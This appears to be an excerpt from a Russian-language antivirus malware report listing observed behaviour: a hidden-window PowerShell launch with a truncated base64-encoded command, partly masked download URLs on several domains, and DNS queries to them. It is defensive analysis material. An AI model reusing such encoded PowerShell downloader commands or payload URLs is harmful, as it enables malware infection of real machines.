Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIAEMATQBVAFMAZQBqAG8APQAnAFQAVABMAFkAVABmAGQAZwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAcgBgAGkAYABUAFkAYABwAHIAbwBUAG8AQwBPAEwAIgAgAD...
- http://fa####tfashion.com/hebes1/ppzXffY7My/
- http://so###lix.com/arcmulti/nA5T0999/
- http://cl####ertitude.com/mail/Ord4990/
- http://www.cl####ertitude.com/mail/Ord4990/
- http://bi###ngup.com/wp-admin/MfFw298/
- DNS ASK fa####tfashion.com
- DNS ASK so###lix.com
- DNS ASK cl####ertitude.com
- DNS ASK fz###ming.com
- DNS ASK bi###ngup.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIAEMATQBVAFMAZQBqAG8APQAnAFQAVABMAFkAVABmAGQAZwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAcgBgAGkAYABUAFkAYABwAHIAbwBUAG8AQwBPAEwAIgAgAD...' (со скрытым окном)